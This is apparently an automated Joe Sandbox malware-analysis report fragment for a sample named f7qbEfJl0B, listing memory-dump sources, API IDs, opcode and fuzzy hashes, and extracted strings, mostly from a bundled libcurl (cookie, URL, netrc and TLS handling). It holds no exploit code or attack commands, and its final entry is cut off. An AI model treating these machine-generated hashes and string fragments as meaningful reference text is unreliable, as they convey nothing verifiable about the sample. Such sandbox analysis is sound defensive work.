                                                            • ioctlsocket.WS2_32(?,8004667E,?,?,00FCAF56,?,00000001), ref: 00FF67FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocket
                                                            • String ID:
                                                            • API String ID: 3577187118-0
                                                            • Opcode ID: d570a4ddf8bfdd3f577e813069b6d3cfc04d97a2f07fda49278db3bc7c5094bf
                                                            • Instruction ID: dcf12e079fbf72db3c063c2446cee2c0e52366e7f7cae42da3d2a3a0c496b0f0
                                                            • Opcode Fuzzy Hash: d570a4ddf8bfdd3f577e813069b6d3cfc04d97a2f07fda49278db3bc7c5094bf
                                                            • Instruction Fuzzy Hash: 47C012F1209200AFD60C4724D855A2EB6E8DB84255F01491CB08692180EA349550CB16
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 2280397431fe9f03e493872cc5469d6a23bfb4fe95256f04200748773a8f27f3
                                                            • Instruction ID: 700a23938a554c9532bb5a822326fdc163035a0fb7d8e8a9c7b74604fa86c369
                                                            • Opcode Fuzzy Hash: 2280397431fe9f03e493872cc5469d6a23bfb4fe95256f04200748773a8f27f3
                                                            • Instruction Fuzzy Hash: 80C04CA0C5474446D740BA38864611D79E47741104FC11A68A98596195F62893288667
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175484888.0000000006DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6de0000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b84ede2e1b3eca65b41ff9ec9d4588e6001553ab2968989921ab216f95a834d
                                                            • Instruction ID: 86079655223655e3667062b896906038a7d838561cb70b338ba9c0904f860e9e
                                                            • Opcode Fuzzy Hash: 3b84ede2e1b3eca65b41ff9ec9d4588e6001553ab2968989921ab216f95a834d
                                                            • Instruction Fuzzy Hash: 52112BB7A4C0199DB7C2F68066A0DFA377AB6963347314053E0DBEA101D1E58F66C1F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175484888.0000000006DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6de0000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8cd076400fc52005af82fa576ce7235bae80429698848bff13a9e13b9e2ce500
                                                            • Instruction ID: 0dc8a4a223420d39a2a6fa383bf6ec12f3b4bf499df4e6a78ef648a8b5a98929
                                                            • Opcode Fuzzy Hash: 8cd076400fc52005af82fa576ce7235bae80429698848bff13a9e13b9e2ce500
                                                            • Instruction Fuzzy Hash: 0D112BB798C019ADB781F680A690DFA377AB6953347314016E0C7A6101D2E4CE65C1F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175751397.0000000006E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e80000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb885eb9aaff3d2496e7c45fd8feb3f67a5d71d6192d14a3ecda5429e1a8712f
                                                            • Instruction ID: dd17e783d663e0accaaf75fb32b6d62a9a41e02058e6c5e778665eece4afe31d
                                                            • Opcode Fuzzy Hash: bb885eb9aaff3d2496e7c45fd8feb3f67a5d71d6192d14a3ecda5429e1a8712f
                                                            • Instruction Fuzzy Hash: A5F044EB1881107DB192A5812B68AF75B7EE2D3730731C827F40AE4907E2D90B5D9171
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175751397.0000000006E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e80000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43133177ba5105a8732824d30084ea171a829a95cf7f3cc1629f055fbbcbf449
                                                            • Instruction ID: 3966f2bbf4d7759d5c764628c5feef54206be4bd7cdae099ec544136a07fe9b6
                                                            • Opcode Fuzzy Hash: 43133177ba5105a8732824d30084ea171a829a95cf7f3cc1629f055fbbcbf449
                                                            • Instruction Fuzzy Hash: 55F0C8EB18D1247DB252B4912B646FE6B2EE1C33343308426F40AD9843F3854A6DA071
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175751397.0000000006E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e80000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3b741f84a1735cc1572a5d0c871faaccf8bb3f86a832a2085ba570d1d2742d2
                                                            • Instruction ID: 71c9f6769723f27ae7675f8d3a9683d7b1df5640399c31e6d71adb82b3db7c49
                                                            • Opcode Fuzzy Hash: d3b741f84a1735cc1572a5d0c871faaccf8bb3f86a832a2085ba570d1d2742d2
                                                            • Instruction Fuzzy Hash: DEF0B4FB1881247DB252B4812B549FBAB2EE1C33703308426B40BD4803F2894A5D6071
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175484888.0000000006DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6de0000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 308087c0ab74151da075416ff122cf367e35bfbe5b721f93a518c008bb3e5ae1
                                                            • Instruction ID: 42c940cb7abd1f71f980160e1f98a7902ed5e56b534c92b877e53bcae8d0ef7f
                                                            • Opcode Fuzzy Hash: 308087c0ab74151da075416ff122cf367e35bfbe5b721f93a518c008bb3e5ae1
                                                            • Instruction Fuzzy Hash: 3C01C031E4D165DEF7C2A6740A907EE7BF27A17320F360092D0C6F6902C2488626C2B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175484888.0000000006DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6de0000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d18078d752c28ce54f09b63c871abfc18bc6ab06fd58e8c1756abc40f5e039ae
                                                            • Instruction ID: 30b75f6f76e0d6e9dcda45dd54bf77b59cb8a486a652ca638bdb8fdbb30adc5b
                                                            • Opcode Fuzzy Hash: d18078d752c28ce54f09b63c871abfc18bc6ab06fd58e8c1756abc40f5e039ae
                                                            • Instruction Fuzzy Hash: EEF096B1D0C018DDB781EA805650EFA62BDB659325B314012E0C7B5501C2E4CB60C1F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                            • API String ID: 0-1371176463
                                                            • Opcode ID: 6f1893060c4be21ccb8309f47cdc140d8f49d31d9864e6c48cc94e72578effcb
                                                            • Instruction ID: 91370952d77f5dfd59a09db642061331dc292d88740b08f8d695a44f6e4acc31
                                                            • Opcode Fuzzy Hash: 6f1893060c4be21ccb8309f47cdc140d8f49d31d9864e6c48cc94e72578effcb
                                                            • Instruction Fuzzy Hash: 47B25771E483006BEB659F24DC51B66B7D2BF64314F0C492EE8899B382E775EC40B792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                            • API String ID: 0-122532811
                                                            • Opcode ID: 4352af39dc47453e72fc20e7d037dcb2f23f9e2cd4f914817fdd3fa32c596162
                                                            • Instruction ID: 542882c311f5c2fbfece403386c210f95028d4f78a86f5bcc34db5ba4693de9c
                                                            • Opcode Fuzzy Hash: 4352af39dc47453e72fc20e7d037dcb2f23f9e2cd4f914817fdd3fa32c596162
                                                            • Instruction Fuzzy Hash: 4E42F8B1B08701AFD708DE28CC81B6BB6EAFFC4704F04892CF55D97291E775A9149B92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                            • API String ID: 0-3977460686
                                                            • Opcode ID: 06bfd9ecd23d3c78e31777cc7e77eae235d959f0bcf73a5aa7ec329357b5f079
                                                            • Instruction ID: 06069bf2b90c2ac1c2bbfad9191e08f041cba0c2788abab603c92f510f70606a
                                                            • Opcode Fuzzy Hash: 06bfd9ecd23d3c78e31777cc7e77eae235d959f0bcf73a5aa7ec329357b5f079
                                                            • Instruction Fuzzy Hash: 6F3217F2E083018BC7249E289C4131AB7D5ABD6330F15472DF9A59B3D6E7B4F941A782
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                            • API String ID: 0-1574211403
                                                            • Opcode ID: e4de2bf575cf248f7a9a65c4a08c5c5dea016d8bce1dd93bca32049e91d5b243
                                                            • Instruction ID: efd68ee0cdcadec850589b568bd44e25b915756908a45d01193d4e1c0818ede8
                                                            • Opcode Fuzzy Hash: e4de2bf575cf248f7a9a65c4a08c5c5dea016d8bce1dd93bca32049e91d5b243
                                                            • Instruction Fuzzy Hash: 0A613FE5E0830267F794A628DC91B7F76C9AF98248F44843CFDCAD6282FD75D9108293
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                            • API String ID: 0-1914377741
                                                            • Opcode ID: 35726936804fa16000b616f7cb26b65d1ebc6c12f08cd2f4914ba18d3bfa2f50
                                                            • Instruction ID: ec2af0a1ecf5827d66484867397d5af6d46c8a55dea5e35f0f0987f06c361aaf
                                                            • Opcode Fuzzy Hash: 35726936804fa16000b616f7cb26b65d1ebc6c12f08cd2f4914ba18d3bfa2f50
                                                            • Instruction Fuzzy Hash: 26724930E08B419FF7319A2AC4467E677D26F91B54F08861CED845B293E77ED884EB81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                            • API String ID: 0-3476178709
                                                            • Opcode ID: 835383ae6f3c68e3faa464ae31c77dc7aead60adbb9c2aec078f86b1b395e060
                                                            • Instruction ID: c2cb92bc82b371b319b98d6705cfd48ee0d10e1a6c34c6539877489f1cd68216
                                                            • Opcode Fuzzy Hash: 835383ae6f3c68e3faa464ae31c77dc7aead60adbb9c2aec078f86b1b395e060
                                                            • Instruction Fuzzy Hash: 9E31D5A3B14E4526F7280019DCC6F3E105BC3C6F10F6AC23EFA069B6C6E8F59D0461A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $.$;$?$?$xn--$xn--
                                                            • API String ID: 0-543057197
                                                            • Opcode ID: ebdc2e43782ec97efb895b59d1325a9b2bbfc266dd3e024baed34792193cfb60
                                                            • Instruction ID: 47263e4294b7ed7a99c042921b26cba8a1c99e32fabd9e1bb3ec271e6c9c01dc
                                                            • Opcode Fuzzy Hash: ebdc2e43782ec97efb895b59d1325a9b2bbfc266dd3e024baed34792193cfb60
                                                            • Instruction Fuzzy Hash: EB2228B1A043039BEBA19E28DC40B6F77D9AF94348F08456CFDC997296E739D904C792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $d$nil)
                                                            • API String ID: 0-394766432
                                                            • Opcode ID: 01c56558ef993bd982f94f959b3823a77cfd10d90719361fbe8abf3e147598d4
                                                            • Instruction ID: cdac391adb42eb055578ec7cff9135b9d4ceead8ca74aaaa714ea93e5358f11d
                                                            • Opcode Fuzzy Hash: 01c56558ef993bd982f94f959b3823a77cfd10d90719361fbe8abf3e147598d4
                                                            • Instruction Fuzzy Hash: 0B13AE706083018FD729DF2CC08066ABBE5BFC9358F54492DFA959B369D771E849CB82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 0-2555271450
                                                            • Opcode ID: 61abe8f8ad54f57c6505ecb0c0ae1a059d02af4c30fa3075dd6c23c9f7ed4ad4
                                                            • Instruction ID: 21153a10fcded08f650e81483ad4dcb97089172a57323be7b30deb7e54d11e5d
                                                            • Opcode Fuzzy Hash: 61abe8f8ad54f57c6505ecb0c0ae1a059d02af4c30fa3075dd6c23c9f7ed4ad4
                                                            • Instruction Fuzzy Hash: 63C29E31A083418FEB15CF28D59076AB7E2FFC8724F158A2DE8999B355D730EC459B82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 0-2555271450
                                                            • Opcode ID: d9647423fa0a044a1d4defe9a4eb39a0db377179b2fbde2bd03bbe66dd8b2390
                                                            • Instruction ID: 5d8abd28e37c66dda1dcb3a74807083e1707ef96af7b6f980ca0d89f741dc2d5
                                                            • Opcode Fuzzy Hash: d9647423fa0a044a1d4defe9a4eb39a0db377179b2fbde2bd03bbe66dd8b2390
                                                            • Instruction Fuzzy Hash: FC826F71A083419FEB14CE28C88072BB7E1AFD5724F148A6DF9A997391D734DC49DB82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: default$login$macdef$machine$netrc.c$password
                                                            • API String ID: 0-1043775505
                                                            • Opcode ID: e6e8ae0685fac933fc7f8f98f97dca194813246cae7f28394e3c62628d4b4173
                                                            • Instruction ID: 595333a56b91c96b41a5a3f6311b4da7bc606d236f0472c5f3bc17b65df19447
                                                            • Opcode Fuzzy Hash: e6e8ae0685fac933fc7f8f98f97dca194813246cae7f28394e3c62628d4b4173
                                                            • Instruction Fuzzy Hash: 17E13A71908345ABE7119F21884273B7BD0AF85718F18442CFEC5DB361EBB9D948E7A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                            • API String ID: 0-2839762339
                                                            • Opcode ID: 278393a5c1a1bd2453f526aa9933049cf948720421d98680c0e19edc0821b2ef
                                                            • Instruction ID: e10fdcbc1047ebd582483b95ab7cf3730fec8d2529580a4bb0ffc85fe27794f4
                                                            • Opcode Fuzzy Hash: 278393a5c1a1bd2453f526aa9933049cf948720421d98680c0e19edc0821b2ef
                                                            • Instruction Fuzzy Hash: D902FCB16083419FE7299F29CC41B6BBBD4BF65358F08887CE98987249E771E814C792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                            • API String ID: 0-3285806060
                                                            • Opcode ID: 01d85ef0bbde8f380ceed9645fc5454ff143deaac5f70b20c877e1f69f1102e6
                                                            • Instruction ID: 7e9463dea48c45c4d879318530e5a413d36633b3887d4db8b95e20100ce42a90
                                                            • Opcode Fuzzy Hash: 01d85ef0bbde8f380ceed9645fc5454ff143deaac5f70b20c877e1f69f1102e6
                                                            • Instruction Fuzzy Hash: D9D1F8F2A0A3059BF725AE2CCAC037EBBD1AF85304F04497DE9C59B281D7749944D782
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$@$gfff$gfff
                                                            • API String ID: 0-2633265772
                                                            • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                            • Instruction ID: 6b4428fb309208d8ed61996f529f3aeb3f5dc1864698b62d88695a57ca6fd866
                                                            • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                            • Instruction Fuzzy Hash: 88D1C37160470A8BD718DF29C48431BBBE2AFD4358F08D92DE8498B75DD774D909C792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %$&$urlapi.c
                                                            • API String ID: 0-3891957821
                                                            • Opcode ID: de76218539798389a7b9592960692ed402f6d844f0d5d592b887fb3e591c967b
                                                            • Instruction ID: 3845c769c764ddb4dc065f7fdd2631a98979fcb34bed4dd0d47d8e0ebdbb4024
                                                            • Opcode Fuzzy Hash: de76218539798389a7b9592960692ed402f6d844f0d5d592b887fb3e591c967b
                                                            • Instruction Fuzzy Hash: C712A0A1E083419BFB245A228C517FB77D69B91364F18452DE886CA3C2FA3DD844BF52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $
                                                            • API String ID: 0-227171996
                                                            • Opcode ID: 6e67d5989c33684e72c80cdc9c4f02ad07fc7e03b9877225a659771fd6ddd9d2
                                                            • Instruction ID: d781688b70b2bb1391d809a4ecafa760805a4782642d188e9fae92a876f414eb
                                                            • Opcode Fuzzy Hash: 6e67d5989c33684e72c80cdc9c4f02ad07fc7e03b9877225a659771fd6ddd9d2
                                                            • Instruction Fuzzy Hash: 4EE230B1A083618FD321EF29C98071BFBE1BF88748F14891DE99997351E775E844CB82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                                            • API String ID: 0-424504254
                                                            • Opcode ID: 7aa8ac923aba281d0f11665adae91dab15ae165092a5b3c1f2a57fb52bf8622b
                                                            • Instruction ID: 123b04054529355c8f61353c743f8793dfc6b6d267307eef19f301bfa47078f6
                                                            • Opcode Fuzzy Hash: 7aa8ac923aba281d0f11665adae91dab15ae165092a5b3c1f2a57fb52bf8622b
                                                            • Instruction Fuzzy Hash: 89317962E083515BE72A1D3E9C81BB57A855FA5328F1C433CE4C58B296F699CC00EB93
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$4
                                                            • API String ID: 0-353776824
                                                            • Opcode ID: 15e4282e77ea77c2bd6e55698c76e87bf6115b75ead50f05b4dc5af9f4b6e44f
                                                            • Instruction ID: 899d7d8e8a905602b06b947a353ae2bd7053f04c957551ddf6659c1200751cb0
                                                            • Opcode Fuzzy Hash: 15e4282e77ea77c2bd6e55698c76e87bf6115b75ead50f05b4dc5af9f4b6e44f
                                                            • Instruction Fuzzy Hash: 4422B035A087018FD716CF2CC8907AAF7E4FF84318F048A6DE99997391D774A895CB86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$4
                                                            • API String ID: 0-353776824
                                                            • Opcode ID: bb83d3168fdb8f8be5fff6f57920715f437eb2401ca8cf18d25a885fa187a2e8
                                                            • Instruction ID: 785865143ec568ad2de5435c87dd185b40a3d17a61ed222153e4162676e1d229
                                                            • Opcode Fuzzy Hash: bb83d3168fdb8f8be5fff6f57920715f437eb2401ca8cf18d25a885fa187a2e8
                                                            • Instruction Fuzzy Hash: 5612E132A087018BC766CF18C4947ABBBE5FFC4318F198A7DE99957391D7749884CB82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H$xn--
                                                            • API String ID: 0-4022323365
                                                            • Opcode ID: 83a4f5c7d105e0e9e5c286406c7dc0ce3cf11f189ee22495ae120db82792697d
                                                            • Instruction ID: d26bef30e18fabfeed5726ac506e4c81ee63aef30f514ca850ebef616ebfb18e
                                                            • Opcode Fuzzy Hash: 83a4f5c7d105e0e9e5c286406c7dc0ce3cf11f189ee22495ae120db82792697d
                                                            • Instruction Fuzzy Hash: 6FE128726087158BD71CDE2CD8C072ABBD2ABC8318F198A3DD9D687389E774DC458742
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Downgrades to HTTP/1.1$multi.c
                                                            • API String ID: 0-3089350377
                                                            • Opcode ID: 51ec2929b1812b96c04a3335a1d9a9627f8c6e44d7fbba45bc5b7126adf98c3c
                                                            • Instruction ID: b898fc01937f0545498089b08837bafa256672df91a637dfff5ff7cae4ab9bb4
                                                            • Opcode Fuzzy Hash: 51ec2929b1812b96c04a3335a1d9a9627f8c6e44d7fbba45bc5b7126adf98c3c
